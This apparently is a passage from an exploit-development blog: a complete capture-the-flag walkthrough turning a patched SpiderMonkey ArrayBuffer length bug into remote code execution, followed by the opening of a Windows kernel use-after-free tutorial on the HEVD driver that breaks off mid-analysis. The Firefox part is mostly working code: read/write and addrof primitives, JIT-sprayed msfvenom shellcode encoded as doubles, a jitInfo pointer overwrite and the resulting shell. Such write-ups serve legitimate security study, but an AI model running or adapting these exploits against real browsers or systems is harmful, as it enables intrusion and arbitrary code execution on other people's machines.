+    return false;
+  }
+
+  if (buffer->isDetached()) { // Could have been detached during argument processing
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 4
+  buffer->setByteLength(targetLength);
+
+  args.rval().setUndefined();
+  return true;
+}


# removed length sanity check
void ArrayBufferObject::setByteLength(size_t length) {
-  MOZ_ASSERT(length <= maxBufferByteLength());
+//  MOZ_ASSERT(length <= maxBufferByteLength());
   setFixedSlot(BYTE_LENGTH_SLOT, PrivateValue(length));
}

We can see that a new setter was added that allows to set byteLength on an ArrayBuffer and that a check was removed that was checking whether the length is below maxBufferByteLength. Without reading everything in the patch diff we can already assume that we will have to create an ArrayBuffer object and then set its byteLength to a large value to achieve out-of-bounds memory access when accessing the contents of the ArrayBuffer.

Before trying to verify our assumption we have to create a debug environment to develop the exploit.

Preparing the debug environment

To quickly test our exploit without having to start Firefox itself, we can compile its JavaScript engine, Spidermonkey, locally. We will do that both in debug and in release mode (the reason for both will be clear later):

rustup update
hg clone http://hg.mozilla.org/mozilla-central spidermonkey
cd spidermonkey

spidermonkey patch -p1 < ../pwn_midenios/src/diff.patch
patching file js/src/vm/ArrayBufferObject.cpp
Hunk #1 succeeded at 325 (offset -11 lines).
Hunk #2 succeeded at 366 (offset -11 lines).
Hunk #3 succeeded at 1031 (offset -7 lines).
patching file js/src/vm/ArrayBufferObject.h
Hunk #1 succeeded at 167 (offset 1 line).
Hunk #2 succeeded at 339 (offset 1 line).

cd spidermonkey/js/src
mkdir build_DBG.OBJ
cd build_DBG.OBJ
../configure --enable-debug --disable-optimize
make -j8

cd ..
mkdir build.OBJ
cd build.OBJ
../configure --disable-debug --disable-optimize
make -j8

After compiling both versions we can find the js executable in both build directories in dist/bin/. For debugging I will use gdb with https://hugsy.github.io/gef/. Now that we have our environment setup, we can write a simple PoC that does an out-of-bounds read.

We define an ArrayBuffer “A” and use the new byteLength setter to put a large value there. We then create another ArrayBuffer “B” just to have an adjacent object in memory (it will be placed exactly next to the first one). Then we create a TypedArray (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray) from our ArrayBuffer. This is done so we can access the contents of the underlying binary buffer as an array.

Finally, we try to dump the contents of “A” which is only defined up to the 10th iteration (we set the size to 80 – so 10 8-byte values). However, due to our manipulated byte length, we can now print beyond that boundary and dump the memory of the adjacent object “B”.

Poc_0x01.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n


// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBuf = new BigUint64Array(bBuf)
bBuf[0] = 0x4242424242424242n

// access A as a TypedArray out of bounds to read some metadata/data of B
for(let i=0;i<20;i++){
    console.log(`${i} ${aBuf[i].toString(16)}`)
}

Running the PoC shows that we can indeed access beyond the size of the ArrayBuffer and see memory that does not belong to it:

spidermonkey/js/src/build_DBG.OBJ/dist/bin/js -i pwn_0x01.js
0 4141414141414141
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 fffe4d4d4d4d4d4d
11 fffe4d4d4d4d4d4d
12 58dcd466700
13 5618d8518088
14 5618d8517828
15 58dcd46a160
16 50
17 fffe3ee4bd6007e0
18 fff8800000000000
19 4242424242424242

Obtaining a read/write primitive

So what are these values? Let’s have a look in gdb at “A” first (which is a TypedArray):

gdb -p $(pidof js)

gef➤  grep 0x4141414141414141
[+] Searching '\x41\x41\x41\x41\x41\x41\x41\x41' in memory
[+] In (0x58dcd400000-0x58dcd500000), permission=rw-
  0x58dcd469038 - 0x58dcd469040  →   "AAAAAAAA"
  0x58dcd46a0c8 - 0x58dcd46a0d0  →   "AAAAAAAA"
[+] In (0x3ee4bd600000-0x3ee4bd700000), permission=rw-
  0x3ee4bd600848 - 0x3ee4bd600868  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6'(0x7f4343996000-0x7f43439ee000), permission=r--
  0x7f43439bc440 - 0x7f43439bc460  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc448 - 0x7f43439bc468  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc450 - 0x7f43439bc470  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc458 - 0x7f43439bc478  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"


gef➤  x/40xg 0x58dcd46a0c8-0x40
0x58dcd46a088:    0x0000000000000000                  0x0000058dcd466700 (*shape)
0x58dcd46a098:    0x00005618d8518088 (*slots)         0x00005618d8517828 (*elementsHdr)
0x58dcd46a0a8:    0x0000058dcd46a0c8 (*elementsData)  0x00000000000003e8 (byteLength)
0x58dcd46a0b8:    0xfffe3ee4bd6007a0 (*typedArray)    0xfff8800000000000 (offset)
0x58dcd46a0c8:    0x4141414141414141 (data start)     0x0000000000000000 
0x58dcd46a0d8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0e8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0f8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a108:    0x0000000000000000                  0x0000000000000000 (data end)
0x58dcd46a118:    0xfffe4d4d4d4d4d4d                  0xfffe4d4d4d4d4d4d
0x58dcd46a128:    0x0000058dcd466700                  0x00005618d8518088
0x58dcd46a138:    0x00005618d8517828                  0x0000058dcd46a160 
0x58dcd46a148:    0x0000000000000050                  0xfffe3ee4bd6007e0
0x58dcd46a158:    0xfff8800000000000                  0x4242424242424242 
...

We can relatively easily find the same values in gdb by grepping for 0x4141414141414141 which we placed as the first value in the “A” array. To understand what these values are, we have to look at how these objects work internally. I annotated the first object in the debug view above to show what some of these values are representing.

The structure we see here is based on a NativeObject which most JavaScript objects inherit from (in the source it does not look exactly like this but it helps in understanding the layout (https://searchfox.org/mozilla-central/source/js/src/vm/NativeObject.h#547). I tried to illustrate the memory layout below (some of the names I made up):

---[Meta Data]---
*shape
*slots
*elementsHeader
*elementsData  --------------
byteLength                   |
*typedArrayObj               |
offset                       |
---[Data]---                 |
0x414141414141         <-----
...

shape: Points to names of properties and corresponding indices into the slots array.

slots: Points to an array of values for properties. Here: emptyObjectSlotsHeaders.

elementsHeader: Here emptyElementsHeader.

elementsData: Points to the data (our array contents).

byteLength: The byteLength we can set via the vulnerable setter.

typedArrayObj: This is a tagged pointer that is pointing to the BigUint64Array Metadata.

offset: Contains 0xfff8800000000000 which is the value zero, type tagged as an integer.

More detailed information can be found in this post: https://vigneshsrao.github.io/posts/play-with-spidermonkey/. The most important value, for now, is the data pointer (here: 0x0000058dcd46a0c8) which points to the actual data being stored in the ArrayBuffer. Since we set the length of ArrayBuffer “A” to 1000, we can read or write any of the following 125 (1000/8) values. If we were to overwrite the data pointer of ArrrayBuffer “B” to a location where we want to read or write, we could then simply index into “B” to read or write anywhere on the system.

Let’s test this assumption and create some helper functions read64 and write64. These functions both use the out-of-bounds write we achieved via “A” to set the data pointer of “B” to a location of our choice. We then either read or set the value by indexing into “B” as TypedArray.

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)
bBufTyped[0] = 0x4242424242424242n
bBufTyped[1] = 0x4343434343434343n


function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // return first element (exactly where the changed data pointer points to)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

Let’s test the read primitive by reading some values from pointers we see in gdb:

0x3f20d3c6a098: 0x000055fd568dc088  0x000055fd568db828
0x3f20d3c6a0a8: 0x00003f20d3c6a0c8  0x00000000000003e8
0x3f20d3c6a0b8: 0xfffe09cda9d007e0  0xfff8800000000000
0x3f20d3c6a0c8: 0x4141414141414141  0x0000000000000000
0x3f20d3c6a0d8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0e8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0f8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a108: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x4242424242424242
0x3f20d3c6a168: 0x4343434343434343  0x0000000000000000
0x3f20d3c6a178: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a188: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a198: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a1a8: 0x0000000000000000  0xfffe4d4d4d4d4d4d
0x3f20d3c6a1b8: 0xfffe4d4d4d4d4d4d  0x0000000000000000
0x3f20d3c6a1c8: 0x0000000000000000  0x000000000000000
js> console.log(read64(0x00003f20d3c6a160n).toString(16))
4242424242424242
js> console.log(read64(0x00003f20d3c6a168n).toString(16))
4343434343434343
js> console.log(read64(0x000055fd568dc088n).toString(16))
100000000

Writing works as well:

write64(0x00003f20d3c6a160n, 0xcafecafecafecafen)
js> console.log(read64(0x00003ed0df26a160n).toString(16))
cafecafecafecafe

One more primitive

Before we think about what we want to read or write we want to create another helper function that gives us the address of an arbitrary JavaScript object. This is very useful if we want to overwrite pointers in certain JavaScript Objects later on.

function addrof(obj){
    // Set a new property on the ArrayBuffer, it will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

This function requires some explanation. When we create a property on a JavaScript object a pointer to those properties exists inside the object’s metadata (just like our data pointer from before). On the last memory dump we had no properties defined but can still see the slots pointer 2 values before the data pointer:

...
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088 < slots
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160 < elementsData
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x424242424242424
...

Now if we define a custom property b.leak and then use our read primitive to dereference the slots pointer, we get the address of our obj which was placed in the slots array. Note that we must mask off the first 2 bytes since these encode type information (pointer tagging).

Exploitation

If we think about exploitation, we want to get shellcode somewhere in memory and execute it. Unfortunately, it is not that easy because via JavaScript writeable locations are not executable and anything we write from JavaScript might just be interpreted and not even appear consecutive in memory. Even if we had our shellcode in memory and it would be executable – we would still need to find a way to jump to it using just JavaScript since we have some primitives but no control over any registers or the instruction pointer.

Let’s solve the shellcode problem first. One way to get your own code into executable memory is to use double constants. I learned about this method in this SentinelOne blog post: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/. Doubles have an 8-byte backing buffer and if we define a bunch of them as constants after another we can get our shellcode bytes in consecutive, executable memory. I wrote a simple online converter to convert shellcode to doubles: https://vulndev.io/shellcode-converter/.

Shellcode

msfvenom -p linux/x64/exec cmd="/bin/sh -c 'id; bash'" -f csharp

byte[] buf = new byte[58] {0x48,0xb8,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0x00,0x99,0x50,0x54,0x5f,0x52,0x66,0x68,0x2d,
0x63,0x54,0x5e,0x52,0xe8,0x16,0x00,0x00,0x00,0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68,0x20,0x2d,0x63,0x20,0x27,0x69,0x64,0x3b,
0x20,0x62,0x61,0x73,0x68,0x27,0x00,0x56,0x57,0x54,0x5e,0x6a,
0x3b,0x58,0x0f,0x05};

Converted Shellcode

6.867659397734779e+246
7.806615353364766e+184
2.541954188459429e-198
3.2060568060029287e-80
3.4574612453438036e+198
7.57500810708945e-119
1.0802257739008538e+117
-6.828527034370483e-229

Now we define the constants in a function and then call it often enough to trigger the JIT compiler. The JIT compiler essentially compiles certain code from JavaScript to native code if it makes sense (e.g. it’s used a lot) in order to optimize for speed. By calling our function a lot of times we enforce the behavior. Now we can use our addrof primitive to get the address of our JITted function and then use gdb to inspect the memory. Note that we added the double for \x41\x41\x41\x41 as the first constant in order to find the shellcode in memory.

PoC_0x02.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229    
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}
console.log(addrof(shellcode).toString(16));
1362e6600860
js>

gef➤  tele 0x1362e6600860
0x001362e6600860│+0x0000: 0x00209976a3d160  →  0x00209976a3c0a0  →  0x0056278d78d150  →  0x0056278d845433  →  "Function"
0x001362e6600868│+0x0008: 0x0056278c099088  →  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al
0x001362e6600870│+0x0010: 0x0056278c098828  →  <emptyElementsHeader+16> add BYTE PTR [rax], al
0x001362e6600878│+0x0018: 0xfff88000000000a0
0x001362e6600880│+0x0020: 0xfffe209976a3f038
0x001362e6600888│+0x0028: 0x00209976a68150  →  0x002762b3c15cb0  →  0x0fc4f640ec8b4855
0x001362e6600890│+0x0030: 0xfffb209976a652a0
0x001362e6600898│+0x0038: 0x007f71b6cdca18  →  0x007f71b6cdc000  →  0x007f71b6c18000  →  0x0000000000000000
0x001362e66008a0│+0x0040: 0x00209976a6c1c0  →  0x00209976a3c2c8  →  0x0056278d793a90  →  0x0056278bf5b763  →  "BigUint64Array"
0x001362e66008a8│+0x0048: 0x0056278c099088  →  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al

This gives us the address of the JSFunction object of the function. When we look at offset 0x28 we can see an interesting pointer to a heap region. This is the jitInfo pointer (JSFunction.u.native.extra.jitInfo) and points to the JIT code of the function at 0x002762b3c15cb0. This is likely more than just our shellcode though since we just defined constants and its just treated as data at this point. We can disassemble at that address as code and notice that this looks like “real” instructions and not some random data:

x/100i 0x002762b3c15cb0

0x2762b3c15cb0:      push   rbp
0x2762b3c15cb1:      mov    rbp,rsp
0x2762b3c15cb4:      test   spl,0xf
0x2762b3c15cb8:      je     0x2762b3c15cbf
0x2762b3c15cbe:      int3
   ...

So let’s search for our marker and compare the pointers:

gef➤  grep 0x41414141
...
0x2762b3c16d90 - 0x2762b3c16d94  →   "AAAA"
...

We calculate: 0x2762b3c16d90 - 0x002762b3c15cb0 = 0x10E0. This means the JIT area of this function is actually pretty big but if search forward through it we would eventually find our marker. Let’s see if the constants ended up in memory as our shellcode:

x/20xg 0x2762b3c16d90

0x2762b3c16d90: 0x0000000041414141      0x9090909090909090
0x2762b3c16da0: 0x732f6e69622fb848      0x66525f5450990068
0x2762b3c16db0: 0x16e8525e54632d68      0x2f6e69622f000000
...

And as we can see, we found not only our marker but also the shellcode we intended in the correct order on a read/execute page.

After having solved the “shellcode problem” we still need a way to dynamically locate it (since it’s somewhere at a changing offset from where the jitInfo pointer points) and transfer execution to it. Finding the location is not that difficult as we can use our read primitive to scan the memory until we find the marker:

...
shellcode_addr = addrof(shellcode);
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jetInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
    it = it + 8n;  // 8 byte offset to account for magic value
    found = true;
    break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
} 

There is one problem here – if you run it in the debug version it fails:

Assertion failure: !cx->nursery().isInside(ptr)

When running release it does however work. Debug adds some assertions to make sure nothing funky is going on – so most of the time it’s a good idea to start with the debug version but switch to release at some point. In this case, the challenge itself is however also running in debug mode so we will have to fix our exploit to work around that! What I noticed other people are doing to get around this is essentially looping until the shellcode pointer changes (often with some additional logic that didn’t appear to be required) – I have no idea why this is required but it works (please let me know!). So what we can add is a simple loop that waits for that change to occur:

shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
        // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   

With that last problem out of the way, transferring execution to our shellcode is actually quite easy because we can just write to the jitInfo pointer with the location of our shellcode:

write64(jitinfo, shellcode_location);
shellcode();

With this, we modified the native code that is executed whenever we call the shellcode function. Remember that before we did define some constants but it was never intended to be code – just (constant) data. By setting the jitInfo pointer forward to these constants we make it code! With this last part being done, we now have a full PoC and can run it to execute commands:

Full exploit

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}

// workaround to make the exploit work in release and debug version
shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
    // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jetInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
    it = it + 8n;  // 8 byte offset to account for magic value
    found = true;
    break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
}  

shellcode_location = it;
console.log("[>] Shellcode @ " + shellcode_location.toString(16));

// Overwrite jitInfo pointer and execute modified function
write64(jitinfo, shellcode_location);
shellcode();

This yields a shell:

[>] Function @ 279b70d00860
[>] Jitinfo @ 159537965150
[>] Jit RX @ 2ed9ab64b990
[>] Shellcode @ 2ed9ab64bd30
uid=1000(xct) gid=1000(xct) groups=1000(xct)
xct@kali:/home/xct$

For the remote version, just replace the shellcode with something that will grab the flag – I’ll leave that as an exercise for the reader ;)

The post Browser Exploitation: Firefox OOB to RCE appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Use-After-Free

By: xct
14 July 2022 at 19:48

This part will look at a Use-After-Free vulnerability in HEVD on Windows 11 x64.

Vulnerability Discovery


We are going to tackle this based on the source instead of the assembly again. There are 4 functions that are interesting for the UAF vulnerability:

  • AllocateUaFObjectNonPagedPool
  • FreeUaFObjectNonPagedPool
  • AllocateFakeObjectNonPagedPool
  • UseUaFObjectNonPagedPool

The general idea is that we allocate an object on the kernel heap (on the non-paged pool, which is an area of memory that can not be paged out) using AllocateUaFObjectNonPagedPool. Then we call FreeUaFObjectNonPagedPool which will free the object. If done correctly, there should be no references to the object left in the kernel – this is however not the case here. On allocate, a global variable g_UseAfterFreeObjectNonPagedPool is set to the address of the object:

NTSTATUS AllocateUaFObjectNonPagedPool(VOID) {
    ...
    UseAfterFree = (PUSE_AFTER_FREE_NON_PAGED_POOL) ExAllocatePoolWithTag(NonPagedPool, sizeof(USE_AFTER_FREE_NON_PAGED_POOL), (ULONG)POOL_TAG);
    ...
    g_UseAfterFreeObjectNonPagedPool = UseAfterFree;
    ...  
}

Then when the object gets freed, this reference does not get set to NULL, so it is still pointing to the now freed memory.

NTSTATUS FreeUaFObjectNonPagedPool(VOID){
    ...
    ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);
    ...
}

This in itself would not be a huge issue but this global variable is actually being used by UseUaFObjectNonPagedPool which is running a method called Callback on it:

NTSTATUS UseUaFObjectNonPagedPool(VOID) {
    ...
    if (g_UseAfterFreeObjectNonPagedPool->Callback) {
        g_UseAfterFreeObjectNonPagedPool->Callback();
    }
    ...
}

When the global object has been freed and this function is invoked, we would have undefined behavior. One possibility is that another object of the same size could take its place, and then the driver would attempt to call the Callback function on the new object instead (which for a random object will likely fail since its memory layout will be completely different). HEVD has a AllocateFakeObjectNonPagedPool function that conveniently allows us to create a user-controlled object of the same size. There is however the issue of getting it exactly into the spot of the just before freed object – windows randomizes heap allocations so a new allocation could be created anywhere.

Exploitation

Before starting with any exploitation we have to understand where our object is, how big it is and what a replacement object should look like. We also need to find a way to fill the hole with our object which is not straightforward.

We start with some template code that just allocates the object, triggers a breakpoint, and then frees the object again should we let execution continue:

#include <stdio.h>
#include <Windows.h>

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    
    
    // Allocate UAF Object
    DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL);
    // Debug
    DebugBreak();
    // Free UAF Object
    DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL);

    return 0;
}

We saw in the allocate function earlier that it allocates the object in the non-paged pool using ExAllocatePoolWithTag. The tag it uses (here “Hack”) is a way to identify objects in that pool. We can search for all objects tagged this way in the debugger:

0: kd> !poolused 2 Hack
...
               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 Hack         1          112          0            0	UNKNOWN pooltag 'Hack', please update pooltag.txt

TOTAL         1          112          0            0

This shows that currently there is exactly one allocation with that tag (the one we just created ourselves). Lets now find the address of that object:

0: kd> !poolfind Hack -nonpaged
ffffe60269102050 : tag Hack, size      0x60, Nonpaged pool

This works but can take a lot of time. There is an alternative way to let us check the allocations while they happen with ed nt!PoolHitTag 'Hack'. But for now, we are going to stick with the address we just got with poolfind. It shows us that the size of the object is 0x60 (+0x10 bytes header), which means that we later need to find some native windows kernel object that has the same size.

0: kd> dq ffffe60269102050 L0xC
ffffe602`69102050  fffff800`31117c58 41414141`41414141
ffffe602`69102060  41414141`41414141 41414141`41414141
ffffe602`69102070  41414141`41414141 41414141`41414141
ffffe602`69102080  41414141`41414141 41414141`41414141
ffffe602`69102090  41414141`41414141 41414141`41414141
ffffe602`691020a0  41414141`41414141 00000000`00414141

We can see that this object is mostly filled with “A”s. Only the first value is a function pointer and this is exactly the callback we identified in the introduction section. If we compare that with the object we can see in the source it matches our assumption:

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL {
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;

You might have noticed that the size does not exactly lead to 0x60 when looking at this object (0x54 + 8 = 0x5C). The remaining 4 bytes I assume are padding (we can see they are zero). Now that we know the size we are looking for another kernel object that is suitable for us.

There is some excellent research by Alex Ionescu on Kernel Fengshui which dives into this topic and shows that using CreatePipe and WritePipe allows allocating an almost arbitrary size object (> 0x48) in the non-paged pool. Let’s create such an object and try to find it in memory so we can confirm it has indeed the correct size.

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }
   
    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }  
    return PipeHandles{ readPipe, writePipe };
}

After adding the function to create such pipe objects we can now create one in our main function:

int main() {
   ...
   PipeHandles pipeHandle = CreatePipeObject();
   printf("[>] Handles: 0x%llx, 0x%llx\n", pipeHandle.read, pipeHandle.write);
   getchar();
   DebugBreak();
}

When we run this, we get the handles to the pipes printed out, allowing us to inspect them:

C:\Users\xct\Desktop>exploit.exe
[>] Handles: 0xa8, 0xac
1: kd> !handle 0xa8
PROCESS ffffe6026dceb080
    SessionId: 1  Cid: 18c0    Peb: 27c6f1f000  ParentCid: 10e8
    DirBase: 1ad85d000  ObjectTable: ffff968b91808b00  HandleCount:  43.
    Image: exploit.exe

Handle table at ffff968b91808b00 with 43 entries in use
00a8: Object: ffffe602706bda30  GrantedAccess: 00120189 Entry: ffff968b8f5ff2a0
Object: ffffe602706bda30  Type: (ffffe602696fa7a0) File
    ObjectHeader: ffffe602706bda00 (new version)
        HandleCount: 1  PointerCount: 32768

We can see that it is a file object, that it’s used by our process, and the address it is at. Let’s inspect the memory further:

1: kd> !address ffffe602706bda30
...
Usage:                  
Base Address:           ffffcb8a`6b5d5000
End Address:            fffff780`00000000
Region Size:            00002bf5`94a2b000
VA Type:                SystemRange

1: kd> !pool ffffe602706bda30
Pool page ffffe602706bda30 region is Nonpaged pool
 ffffe602706bd050 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd1e0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd370 size:  190 previous size:    0  (Free)       File
 ffffe602706bd500 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd690 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd820 size:  190 previous size:    0  (Allocated)  File
*ffffe602706bd9b0 size:  190 previous size:    0  (Allocated) *File
		Pooltag File : File objects
 ffffe602706bdb40 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bdcd0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bde60 size:  190 previous size:    0  (Allocated)  File

We can see here that the object is in the nonpaged pool but its size is 0x190 which is not quite what we are looking for so what is going on? We are not really looking for the file object itself but for the DATA_ENTRY object that is created, which is an undocumented structure. These objects will be allocated with a tag: “NpFr”. Let’s try to find it:

1: kd> !poolused 2 NpFr
Using a machine size of 1ffe4d pages to configure the kd cache
..
 Sorting by NonPaged Pool Consumed

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

